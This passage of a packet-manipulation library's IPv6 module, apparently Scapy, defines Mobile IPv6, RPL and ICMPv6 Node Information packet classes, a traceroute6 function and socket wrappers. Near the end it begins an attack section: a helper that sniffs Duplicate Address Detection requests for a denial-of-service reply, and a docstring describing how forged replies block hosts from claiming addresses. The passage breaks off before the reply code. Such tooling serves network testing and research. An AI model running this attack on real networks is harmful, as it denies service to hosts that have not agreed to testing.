2768 name = "ICMPv6 Node Information Reply - IPv4 addresses"
2769 qtype = 4
2770
2771
2772class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
2773 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2774 code = 1
2775
2776
2777class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2778 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2779 code = 2
2780
2781
2782def _niquery_guesser(p):
2783 cls = conf.raw_layer
2784 type = orb(p[0])
2785 if type == 139: # Node Info Query specific stuff
2786 if len(p) > 6:
2787 qtype, = struct.unpack("!H", p[4:6])
2788 cls = {0: ICMPv6NIQueryNOOP,
2789 2: ICMPv6NIQueryName,
2790 3: ICMPv6NIQueryIPv6,
2791 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2792 elif type == 140: # Node Info Reply specific stuff
2793 code = orb(p[1])
2794 if code == 0:
2795 if len(p) > 6:
2796 qtype, = struct.unpack("!H", p[4:6])
2797 cls = {2: ICMPv6NIReplyName,
2798 3: ICMPv6NIReplyIPv6,
2799 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2800 elif code == 1:
2801 cls = ICMPv6NIReplyRefuse
2802 elif code == 2:
2803 cls = ICMPv6NIReplyUnknown
2804 return cls
2805
2806
2807#############################################################################
2808#############################################################################
2809# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2810#############################################################################
2811#############################################################################
2812
2813# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2814rplcodes = {0: "DIS",
2815 1: "DIO",
2816 2: "DAO",
2817 3: "DAO-ACK",
2818 # 4: "P2P-DRO",
2819 # 5: "P2P-DRO-ACK",
2820 # 6: "Measurement",
2821 7: "DCO",
2822 8: "DCO-ACK"}
2823
2824
2825class ICMPv6RPL(_ICMPv6): # RFC 6550
2826 name = 'RPL'
2827 fields_desc = [ByteEnumField("type", 155, icmp6types),
2828 ByteEnumField("code", 0, rplcodes),
2829 XShortField("cksum", None)]
2830 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2831
2832
2833#############################################################################
2834#############################################################################
2835# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2836#############################################################################
2837#############################################################################
2838
2839# Mobile IPv6 ICMPv6 related classes
2840
2841class ICMPv6HAADRequest(_ICMPv6):
2842 name = 'ICMPv6 Home Agent Address Discovery Request'
2843 fields_desc = [ByteEnumField("type", 144, icmp6types),
2844 ByteField("code", 0),
2845 XShortField("cksum", None),
2846 XShortField("id", None),
2847 BitEnumField("R", 1, 1, {1: 'MR'}),
2848 XBitField("res", 0, 15)]
2849
2850 def hashret(self):
2851 return struct.pack("!H", self.id) + self.payload.hashret()
2852
2853
2854class ICMPv6HAADReply(_ICMPv6):
2855 name = 'ICMPv6 Home Agent Address Discovery Reply'
2856 fields_desc = [ByteEnumField("type", 145, icmp6types),
2857 ByteField("code", 0),
2858 XShortField("cksum", None),
2859 XShortField("id", None),
2860 BitEnumField("R", 1, 1, {1: 'MR'}),
2861 XBitField("res", 0, 15),
2862 IP6ListField('addresses', None)]
2863
2864 def hashret(self):
2865 return struct.pack("!H", self.id) + self.payload.hashret()
2866
2867 def answers(self, other):
2868 if not isinstance(other, ICMPv6HAADRequest):
2869 return 0
2870 return self.id == other.id
2871
2872
2873class ICMPv6MPSol(_ICMPv6):
2874 name = 'ICMPv6 Mobile Prefix Solicitation'
2875 fields_desc = [ByteEnumField("type", 146, icmp6types),
2876 ByteField("code", 0),
2877 XShortField("cksum", None),
2878 XShortField("id", None),
2879 XShortField("res", 0)]
2880
2881 def _hashret(self):
2882 return struct.pack("!H", self.id)
2883
2884
2885class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2886 name = 'ICMPv6 Mobile Prefix Advertisement'
2887 fields_desc = [ByteEnumField("type", 147, icmp6types),
2888 ByteField("code", 0),
2889 XShortField("cksum", None),
2890 XShortField("id", None),
2891 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2892 XBitField("res", 0, 14)]
2893
2894 def hashret(self):
2895 return struct.pack("!H", self.id)
2896
2897 def answers(self, other):
2898 return isinstance(other, ICMPv6MPSol)
2899
2900# Mobile IPv6 Options classes
2901
2902
2903_mobopttypes = {2: "Binding Refresh Advice",
2904 3: "Alternate Care-of Address",
2905 4: "Nonce Indices",
2906 5: "Binding Authorization Data",
2907 6: "Mobile Network Prefix (RFC3963)",
2908 7: "Link-Layer Address (RFC4068)",
2909 8: "Mobile Node Identifier (RFC4283)",
2910 9: "Mobility Message Authentication (RFC4285)",
2911 10: "Replay Protection (RFC4285)",
2912 11: "CGA Parameters Request (RFC4866)",
2913 12: "CGA Parameters (RFC4866)",
2914 13: "Signature (RFC4866)",
2915 14: "Home Keygen Token (RFC4866)",
2916 15: "Care-of Test Init (RFC4866)",
2917 16: "Care-of Test (RFC4866)"}
2918
2919
2920class _MIP6OptAlign(Packet):
2921 """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2922 This class is inherited by all MIPv6 options to help in computing the
2923 required Padding for that option, i.e. the need for a Pad1 or PadN
2924 option before it. They only need to provide x and y as class
2925 parameters. (x=0 and y=0 are used when no alignment is required)"""
2926
2927 __slots__ = ["x", "y"]
2928
2929 def alignment_delta(self, curpos):
2930 x = self.x
2931 y = self.y
2932 if x == 0 and y == 0:
2933 return 0
2934 delta = x * ((curpos - y + x - 1) // x) + y - curpos
2935 return delta
2936
2937 def extract_padding(self, p):
2938 return b"", p
2939
2940
2941class MIP6OptBRAdvice(_MIP6OptAlign):
2942 name = 'Mobile IPv6 Option - Binding Refresh Advice'
2943 fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2944 ByteField('olen', 2),
2945 ShortField('rinter', 0)]
2946 x = 2
2947 y = 0 # alignment requirement: 2n
2948
2949
2950class MIP6OptAltCoA(_MIP6OptAlign):
2951 name = 'MIPv6 Option - Alternate Care-of Address'
2952 fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2953 ByteField('olen', 16),
2954 IP6Field("acoa", "::")]
2955 x = 8
2956 y = 6 # alignment requirement: 8n+6
2957
2958
2959class MIP6OptNonceIndices(_MIP6OptAlign):
2960 name = 'MIPv6 Option - Nonce Indices'
2961 fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2962 ByteField('olen', 16),
2963 ShortField('hni', 0),
2964 ShortField('coni', 0)]
2965 x = 2
2966 y = 0 # alignment requirement: 2n
2967
2968
2969class MIP6OptBindingAuthData(_MIP6OptAlign):
2970 name = 'MIPv6 Option - Binding Authorization Data'
2971 fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2972 ByteField('olen', 16),
2973 BitField('authenticator', 0, 96)]
2974 x = 8
2975 y = 2 # alignment requirement: 8n+2
2976
2977
2978class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
2979 name = 'NEMO Option - Mobile Network Prefix'
2980 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2981 ByteField("olen", 18),
2982 ByteField("reserved", 0),
2983 ByteField("plen", 64),
2984 IP6Field("prefix", "::")]
2985 x = 8
2986 y = 4 # alignment requirement: 8n+4
2987
2988
2989class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
2990 name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
2991 fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
2992 ByteField("olen", 7),
2993 ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
2994 ByteField("pad", 0),
2995 MACField("lla", ETHER_ANY)] # Only support ethernet
2996 x = 0
2997 y = 0 # alignment requirement: none
2998
2999
3000class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
3001 name = "MIPv6 Option - Mobile Node Identifier"
3002 fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
3003 FieldLenField("olen", None, length_of="id", fmt="B",
3004 adjust=lambda pkt, x: x + 1),
3005 ByteEnumField("subtype", 1, {1: "NAI"}),
3006 StrLenField("id", "",
3007 length_from=lambda pkt: pkt.olen - 1)]
3008 x = 0
3009 y = 0 # alignment requirement: none
3010
3011# We only support decoding and basic build. Automatic HMAC computation is
3012# too much work for our current needs. It is left to the user (I mean ...
3013# you). --arno
3014
3015
3016class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
3017 name = "MIPv6 Option - Mobility Message Authentication"
3018 fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
3019 FieldLenField("olen", None, length_of="authdata", fmt="B",
3020 adjust=lambda pkt, x: x + 5),
3021 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
3022 2: "MN-AAA authentication mobility option"}), # noqa: E501
3023 IntField("mspi", None),
3024 StrLenField("authdata", "A" * 12,
3025 length_from=lambda pkt: pkt.olen - 5)]
3026 x = 4
3027 y = 1 # alignment requirement: 4n+1
3028
3029# Extracted from RFC 1305 (NTP) :
3030# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3031# in seconds relative to 0h on 1 January 1900. The integer part is in the
3032# first 32 bits and the fraction part in the last 32 bits.
3033
3034
3035class NTPTimestampField(LongField):
3036 def i2repr(self, pkt, x):
3037 if x < ((50 * 31536000) << 32):
3038 return "Some date a few decades ago (%d)" % x
3039
3040 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
3041 # January 1st 1970 :
3042 delta = -2209075761
3043 i = int(x >> 32)
3044 j = float(x & 0xffffffff) * 2.0**-32
3045 res = i + j + delta
3046 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
3047
3048 return "%s (%d)" % (t, x)
3049
3050
3051class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
3052 name = "MIPv6 option - Replay Protection"
3053 fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
3054 ByteField("olen", 8),
3055 NTPTimestampField("timestamp", 0)]
3056 x = 8
3057 y = 2 # alignment requirement: 8n+2
3058
3059
3060class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
3061 name = "MIPv6 option - CGA Parameters Request"
3062 fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
3063 ByteField("olen", 0)]
3064 x = 0
3065 y = 0 # alignment requirement: none
3066
3067# XXX TODO: deal with CGA param fragmentation and build of defragmented
3068# XXX version. Passing of a big CGAParam structure should be
3069# XXX simplified. Make it hold packets, by the way --arno
3070
3071
3072class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
3073 name = "MIPv6 option - CGA Parameters"
3074 fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
3075 FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
3076 StrLenField("cgaparams", "",
3077 length_from=lambda pkt: pkt.olen)]
3078 x = 0
3079 y = 0 # alignment requirement: none
3080
3081
3082class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
3083 name = "MIPv6 option - Signature"
3084 fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
3085 FieldLenField("olen", None, length_of="sig", fmt="B"),
3086 StrLenField("sig", "",
3087 length_from=lambda pkt: pkt.olen)]
3088 x = 0
3089 y = 0 # alignment requirement: none
3090
3091
3092class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
3093 name = "MIPv6 option - Home Keygen Token"
3094 fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
3095 FieldLenField("olen", None, length_of="hkt", fmt="B"),
3096 StrLenField("hkt", "",
3097 length_from=lambda pkt: pkt.olen)]
3098 x = 0
3099 y = 0 # alignment requirement: none
3100
3101
3102class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
3103 name = "MIPv6 option - Care-of Test Init"
3104 fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
3105 ByteField("olen", 0)]
3106 x = 0
3107 y = 0 # alignment requirement: none
3108
3109
3110class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
3111 name = "MIPv6 option - Care-of Test"
3112 fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
3113 FieldLenField("olen", None, length_of="cokt", fmt="B"),
3114 StrLenField("cokt", b'\x00' * 8,
3115 length_from=lambda pkt: pkt.olen)]
3116 x = 0
3117 y = 0 # alignment requirement: none
3118
3119
3120class MIP6OptUnknown(_MIP6OptAlign):
3121 name = 'Scapy6 - Unknown Mobility Option'
3122 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
3123 FieldLenField("olen", None, length_of="odata", fmt="B"),
3124 StrLenField("odata", "",
3125 length_from=lambda pkt: pkt.olen)]
3126 x = 0
3127 y = 0 # alignment requirement: none
3128
3129 @classmethod
3130 def dispatch_hook(cls, _pkt=None, *_, **kargs):
3131 if _pkt:
3132 o = orb(_pkt[0]) # Option type
3133 if o in moboptcls:
3134 return moboptcls[o]
3135 return cls
3136
3137
3138moboptcls = {0: Pad1,
3139 1: PadN,
3140 2: MIP6OptBRAdvice,
3141 3: MIP6OptAltCoA,
3142 4: MIP6OptNonceIndices,
3143 5: MIP6OptBindingAuthData,
3144 6: MIP6OptMobNetPrefix,
3145 7: MIP6OptLLAddr,
3146 8: MIP6OptMNID,
3147 9: MIP6OptMsgAuth,
3148 10: MIP6OptReplayProtection,
3149 11: MIP6OptCGAParamsReq,
3150 12: MIP6OptCGAParams,
3151 13: MIP6OptSignature,
3152 14: MIP6OptHomeKeygenToken,
3153 15: MIP6OptCareOfTestInit,
3154 16: MIP6OptCareOfTest}
3155
3156
3157# Main Mobile IPv6 Classes
3158
3159mhtypes = {0: 'BRR',
3160 1: 'HoTI',
3161 2: 'CoTI',
3162 3: 'HoT',
3163 4: 'CoT',
3164 5: 'BU',
3165 6: 'BA',
3166 7: 'BE',
3167 8: 'Fast BU',
3168 9: 'Fast BA',
3169 10: 'Fast NA'}
3170
3171# From http://www.iana.org/assignments/mobility-parameters
3172bastatus = {0: 'Binding Update accepted',
3173 1: 'Accepted but prefix discovery necessary',
3174 128: 'Reason unspecified',
3175 129: 'Administratively prohibited',
3176 130: 'Insufficient resources',
3177 131: 'Home registration not supported',
3178 132: 'Not home subnet',
3179 133: 'Not home agent for this mobile node',
3180 134: 'Duplicate Address Detection failed',
3181 135: 'Sequence number out of window',
3182 136: 'Expired home nonce index',
3183 137: 'Expired care-of nonce index',
3184 138: 'Expired nonces',
3185 139: 'Registration type change disallowed',
3186 140: 'Mobile Router Operation not permitted',
3187 141: 'Invalid Prefix',
3188 142: 'Not Authorized for Prefix',
3189 143: 'Forwarding Setup failed (prefixes missing)',
3190 144: 'MIPV6-ID-MISMATCH',
3191 145: 'MIPV6-MESG-ID-REQD',
3192 146: 'MIPV6-AUTH-FAIL',
3193 147: 'Permanent home keygen token unavailable',
3194 148: 'CGA and signature verification failed',
3195 149: 'Permanent home keygen token exists',
3196 150: 'Non-null home nonce index expected'}
3197
3198
3199class _MobilityHeader(Packet):
3200 name = 'Dummy IPv6 Mobility Header'
3201 overload_fields = {IPv6: {"nh": 135}}
3202
3203 def post_build(self, p, pay):
3204 p += pay
3205 tmp_len = self.len
3206 if self.len is None:
3207 tmp_len = (len(p) - 8) // 8
3208 p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3209 if self.cksum is None:
3210 cksum = in6_chksum(135, self.underlayer, p)
3211 else:
3212 cksum = self.cksum
3213 p = p[:4] + struct.pack("!H", cksum) + p[6:]
3214 return p
3215
3216
3217class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
3218 name = "IPv6 Mobility Header - Generic Message"
3219 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3220 ByteField("len", None),
3221 ByteEnumField("mhtype", None, mhtypes),
3222 ByteField("res", None),
3223 XShortField("cksum", None),
3224 StrLenField("msg", b"\x00" * 2,
3225 length_from=lambda pkt: 8 * pkt.len - 6)]
3226
3227
3228class MIP6MH_BRR(_MobilityHeader):
3229 name = "IPv6 Mobility Header - Binding Refresh Request"
3230 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3231 ByteField("len", None),
3232 ByteEnumField("mhtype", 0, mhtypes),
3233 ByteField("res", None),
3234 XShortField("cksum", None),
3235 ShortField("res2", None),
3236 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3237 _OptionsField("options", [], MIP6OptUnknown, 8,
3238 length_from=lambda pkt: 8 * pkt.len)]
3239 overload_fields = {IPv6: {"nh": 135}}
3240
3241 def hashret(self):
3242 # Hack: BRR, BU and BA have the same hashret that returns the same
3243 # value b"\x00\x08\x09" (concatenation of mhtypes). This is
3244 # because we need match BA with BU and BU with BRR. --arno
3245 return b"\x00\x08\x09"
3246
3247
3248class MIP6MH_HoTI(_MobilityHeader):
3249 name = "IPv6 Mobility Header - Home Test Init"
3250 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3251 ByteField("len", None),
3252 ByteEnumField("mhtype", 1, mhtypes),
3253 ByteField("res", None),
3254 XShortField("cksum", None),
3255 StrFixedLenField("reserved", b"\x00" * 2, 2),
3256 StrFixedLenField("cookie", b"\x00" * 8, 8),
3257 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3258 _OptionsField("options", [], MIP6OptUnknown, 16,
3259 length_from=lambda pkt: 8 * (pkt.len - 1))]
3260 overload_fields = {IPv6: {"nh": 135}}
3261
3262 def hashret(self):
3263 return bytes_encode(self.cookie)
3264
3265
3266class MIP6MH_CoTI(MIP6MH_HoTI):
3267 name = "IPv6 Mobility Header - Care-of Test Init"
3268 mhtype = 2
3269
3270 def hashret(self):
3271 return bytes_encode(self.cookie)
3272
3273
3274class MIP6MH_HoT(_MobilityHeader):
3275 name = "IPv6 Mobility Header - Home Test"
3276 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3277 ByteField("len", None),
3278 ByteEnumField("mhtype", 3, mhtypes),
3279 ByteField("res", None),
3280 XShortField("cksum", None),
3281 ShortField("index", None),
3282 StrFixedLenField("cookie", b"\x00" * 8, 8),
3283 StrFixedLenField("token", b"\x00" * 8, 8),
3284 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3285 _OptionsField("options", [], MIP6OptUnknown, 24,
3286 length_from=lambda pkt: 8 * (pkt.len - 2))]
3287 overload_fields = {IPv6: {"nh": 135}}
3288
3289 def hashret(self):
3290 return bytes_encode(self.cookie)
3291
3292 def answers(self, other):
3293 if (isinstance(other, MIP6MH_HoTI) and
3294 self.cookie == other.cookie):
3295 return 1
3296 return 0
3297
3298
3299class MIP6MH_CoT(MIP6MH_HoT):
3300 name = "IPv6 Mobility Header - Care-of Test"
3301 mhtype = 4
3302
3303 def hashret(self):
3304 return bytes_encode(self.cookie)
3305
3306 def answers(self, other):
3307 if (isinstance(other, MIP6MH_CoTI) and
3308 self.cookie == other.cookie):
3309 return 1
3310 return 0
3311
3312
3313class LifetimeField(ShortField):
3314 def i2repr(self, pkt, x):
3315 return "%d sec" % (4 * x)
3316
3317
3318class MIP6MH_BU(_MobilityHeader):
3319 name = "IPv6 Mobility Header - Binding Update"
3320 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3321 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3322 ByteEnumField("mhtype", 5, mhtypes),
3323 ByteField("res", None),
3324 XShortField("cksum", None),
3325 XShortField("seq", None), # TODO: ShortNonceField
3326 FlagsField("flags", "KHA", 7, "PRMKLHA"),
3327 XBitField("reserved", 0, 9),
3328 LifetimeField("mhtime", 3), # unit == 4 seconds
3329 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3330 _OptionsField("options", [], MIP6OptUnknown, 12,
3331 length_from=lambda pkt: 8 * pkt.len - 4)]
3332 overload_fields = {IPv6: {"nh": 135}}
3333
3334 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3335 return b"\x00\x08\x09"
3336
3337 def answers(self, other):
3338 if isinstance(other, MIP6MH_BRR):
3339 return 1
3340 return 0
3341
3342
3343class MIP6MH_BA(_MobilityHeader):
3344 name = "IPv6 Mobility Header - Binding ACK"
3345 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3346 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3347 ByteEnumField("mhtype", 6, mhtypes),
3348 ByteField("res", None),
3349 XShortField("cksum", None),
3350 ByteEnumField("status", 0, bastatus),
3351 FlagsField("flags", "K", 3, "PRK"),
3352 XBitField("res2", None, 5),
3353 XShortField("seq", None), # TODO: ShortNonceField
3354 XShortField("mhtime", 0), # unit == 4 seconds
3355 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3356 _OptionsField("options", [], MIP6OptUnknown, 12,
3357 length_from=lambda pkt: 8 * pkt.len - 4)]
3358 overload_fields = {IPv6: {"nh": 135}}
3359
3360 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3361 return b"\x00\x08\x09"
3362
3363 def answers(self, other):
3364 if (isinstance(other, MIP6MH_BU) and
3365 other.mhtype == 5 and
3366 self.mhtype == 6 and
3367 other.flags & 0x1 and # Ack request flags is set
3368 self.seq == other.seq):
3369 return 1
3370 return 0
3371
3372
3373_bestatus = {1: 'Unknown binding for Home Address destination option',
3374 2: 'Unrecognized MH Type value'}
3375
3376# TODO: match Binding Error to its stimulus
3377
3378
3379class MIP6MH_BE(_MobilityHeader):
3380 name = "IPv6 Mobility Header - Binding Error"
3381 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3382 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3383 ByteEnumField("mhtype", 7, mhtypes),
3384 ByteField("res", 0),
3385 XShortField("cksum", None),
3386 ByteEnumField("status", 0, _bestatus),
3387 ByteField("reserved", 0),
3388 IP6Field("ha", "::"),
3389 _OptionsField("options", [], MIP6OptUnknown, 24,
3390 length_from=lambda pkt: 8 * (pkt.len - 2))]
3391 overload_fields = {IPv6: {"nh": 135}}
3392
3393
3394_mip6_mhtype2cls = {0: MIP6MH_BRR,
3395 1: MIP6MH_HoTI,
3396 2: MIP6MH_CoTI,
3397 3: MIP6MH_HoT,
3398 4: MIP6MH_CoT,
3399 5: MIP6MH_BU,
3400 6: MIP6MH_BA,
3401 7: MIP6MH_BE}
3402
3403
3404#############################################################################
3405#############################################################################
3406# Traceroute6 #
3407#############################################################################
3408#############################################################################
3409
3410class AS_resolver6(AS_resolver_riswhois):
3411 def _resolve_one(self, ip):
3412 """
3413 overloaded version to provide a Whois resolution on the
3414 embedded IPv4 address if the address is 6to4 or Teredo.
3415 Otherwise, the native IPv6 address is passed.
3416 """
3417
3418 if in6_isaddr6to4(ip): # for 6to4, use embedded @
3419 tmp = inet_pton(socket.AF_INET6, ip)
3420 addr = inet_ntop(socket.AF_INET, tmp[2:6])
3421 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
3422 addr = teredoAddrExtractInfo(ip)[2]
3423 else:
3424 addr = ip
3425
3426 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3427
3428 if asn.startswith("AS"):
3429 try:
3430 asn = int(asn[2:])
3431 except ValueError:
3432 pass
3433
3434 return ip, asn, desc
3435
3436
3437class TracerouteResult6(TracerouteResult):
3438 __slots__ = []
3439
3440 def show(self):
3441 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
3442 s.hlim,
3443 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
3444 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
3445 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
3446 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
3447
3448 def get_trace(self):
3449 trace = {}
3450
3451 for s, r in self.res:
3452 if IPv6 not in s:
3453 continue
3454 d = s[IPv6].dst
3455 if d not in trace:
3456 trace[d] = {}
3457
3458 t = not (ICMPv6TimeExceeded in r or
3459 ICMPv6DestUnreach in r or
3460 ICMPv6PacketTooBig in r or
3461 ICMPv6ParamProblem in r)
3462
3463 trace[d][s[IPv6].hlim] = r[IPv6].src, t
3464
3465 for k in trace.values():
3466 try:
3467 m = min(x for x, y in k.items() if y[1])
3468 except ValueError:
3469 continue
3470 for li in list(k): # use list(): k is modified in the loop
3471 if li > m:
3472 del k[li]
3473
3474 return trace
3475
3476 def graph(self, ASres=AS_resolver6(), **kargs):
3477 TracerouteResult.graph(self, ASres=ASres, **kargs)
3478
3479
3480@conf.commands.register
3481def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3482 l4=None, timeout=2, verbose=None, **kargs):
3483 """Instant TCP traceroute using IPv6
3484 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3485 """
3486 if verbose is None:
3487 verbose = conf.verb
3488
3489 if l4 is None:
3490 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
3491 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
3492 else:
3493 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3494 timeout=timeout, verbose=verbose, **kargs)
3495
3496 a = TracerouteResult6(a.res)
3497
3498 if verbose:
3499 a.show()
3500
3501 return a, b
3502
3503#############################################################################
3504#############################################################################
3505# Sockets #
3506#############################################################################
3507#############################################################################
3508
3509
3510if not WINDOWS:
3511 from scapy.supersocket import L3RawSocket
3512
3513 class L3RawSocket6(L3RawSocket):
3514 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
3515 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
3516 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
3517 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
3518 self.iface = iface
3519
3520
3521def IPv6inIP(dst='203.178.135.36', src=None):
3522 _IPv6inIP.dst = dst
3523 _IPv6inIP.src = src
3524 if not conf.L3socket == _IPv6inIP:
3525 _IPv6inIP.cls = conf.L3socket
3526 else:
3527 del conf.L3socket
3528 return _IPv6inIP
3529
3530
3531class _IPv6inIP(SuperSocket):
3532 dst = '127.0.0.1'
3533 src = None
3534 cls = None
3535
3536 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
3537 SuperSocket.__init__(self, family, type, proto)
3538 self.worker = self.cls(**args)
3539
3540 def set(self, dst, src=None):
3541 _IPv6inIP.src = src
3542 _IPv6inIP.dst = dst
3543
3544 def nonblock_recv(self):
3545 p = self.worker.nonblock_recv()
3546 return self._recv(p)
3547
3548 def recv(self, x):
3549 p = self.worker.recv(x)
3550 return self._recv(p, x)
3551
3552 def _recv(self, p, x=MTU):
3553 if p is None:
3554 return p
3555 elif isinstance(p, IP):
3556 # TODO: verify checksum
3557 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3558 if isinstance(p.payload, IPv6):
3559 return p.payload
3560 return p
3561
3562 def send(self, x):
3563 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
3564
3565
3566#############################################################################
3567#############################################################################
3568# Neighbor Discovery Protocol Attacks #
3569#############################################################################
3570#############################################################################
3571
3572def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3573 tgt_filter=None, reply_mac=None):
3574 """
3575 Internal generic helper accepting a specific callback as first argument,
3576 for NS or NA reply. See the two specific functions below.
3577 """
3578
3579 def is_request(req, mac_src_filter, tgt_filter):
3580 """
3581 Check if packet req is a request
3582 """
3583
3584 # Those simple checks are based on Section 5.4.2 of RFC 4862
3585 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3586 return 0
3587
3588 # Get and compare the MAC address
3589 mac_src = req[Ether].src
3590 if mac_src_filter and mac_src != mac_src_filter:
3591 return 0
3592
3593 # Source must be the unspecified address
3594 if req[IPv6].src != "::":
3595 return 0
3596
3597 # Check destination is the link-local solicited-node multicast
3598 # address associated with target address in received NS
3599 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3600 if tgt_filter and tgt != tgt_filter:
3601 return 0
3602 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3603 expected_snma = in6_getnsma(tgt)
3604 if received_snma != expected_snma:
3605 return 0
3606
3607 return 1
3608
3609 if not iface:
3610 iface = conf.iface
3611
3612 # To prevent sniffing our own traffic
3613 if not reply_mac:
3614 reply_mac = get_if_hwaddr(iface)
3615 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3616
3617 sniff(store=0,
3618 filter=sniff_filter,
3619 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3620 prn=lambda x: reply_callback(x, reply_mac, iface),
3621 iface=iface)
3622
3623
3624def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3625 reply_mac=None):
3626 """
3627 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3628 3756. This is done by listening incoming NS messages sent from the
3629 unspecified address and sending a NS reply for the target address,
3630 leading the peer to believe that another node is also performing DAD
3631 for that address.
3632
3633 By default, the fake NS sent to create the DoS uses:
3634 - as target address the target address found in received NS.
